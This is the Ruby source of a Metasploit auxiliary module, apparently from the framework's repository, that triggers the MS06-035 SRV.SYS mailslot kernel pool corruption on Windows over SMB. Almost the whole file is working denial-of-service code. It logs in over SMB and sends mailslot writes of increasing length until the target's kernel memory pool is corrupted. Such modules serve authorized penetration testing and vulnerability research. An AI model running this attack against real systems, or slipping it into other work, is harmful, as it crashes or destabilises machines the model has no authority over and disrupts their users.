metasploit-framework/modules/auxiliary/dos/windows/smb/mailslot_srvsys.rb

95 lines
2.1 KiB
Ruby

require 'msf/core'
module Msf
class Auxiliary::Dos::Windows::Smb::MAILSLOT_SRVSYS_CORRUPT < Msf::Auxiliary
include Auxiliary::Dos
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption',
'Description' => %q{
This module triggers a kernel pool corruption bug in SRV.SYS. Each
call to the mailslot write function results in a two byte return value
being written into the response packet. The code which creates this packet
fails to consider these two bytes in the allocation routine, resulting in
a slow corruption of the kernel memory pool. These two bytes are almost
always set to "\xff\xff" (a short integer with value of -1).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3666 $',
'References' =>
[
['MSB', 'MSB06-035'],
],
'Actions' =>
[
['Attack'],
],
'DefaultAction' => 'Attack',
'DisclosureDate' => 'Jul 11 2006'
))
register_options(
[
OptString.new('MAILSLOT', [ true, "The mailslot name to use", 'Alerter']),
], self.class)
end
# MAILSLOT: HydraLsServer
# MAILSLOT: Messngr
# MAILSLOT: 53cb31a0\\UnimodemNotifyTSP
def run
case action.name
when 'Attack'
print_status("Mangling the kernel, two bytes at a time...");
connect
smb_login
1.upto(1024) do |i|
if (i % 100 == 0)
print_status("Sending request containing #{i.to_s} bytes...")
end
begin
self.simple.client.trans_mailslot("\\MAILSLOT\\"+datastore['MAILSLOT'], "X" * i)
rescue ::Interrupt
return
rescue ::Exception => e
if (i == 1)
print_status("Failed to write any data to the mailslot: #{e.to_s}")
break
end
print_status("Exception occurred on interation #{i.to_s}")
print_status("Error: #{e.class.to_s} > #{e.to_s}")
break
end
end
# Errors:
# 0xc0000034 = object not found
# 0xc0000205 = insufficient resources (too much data)
end
disconnect
end
end
end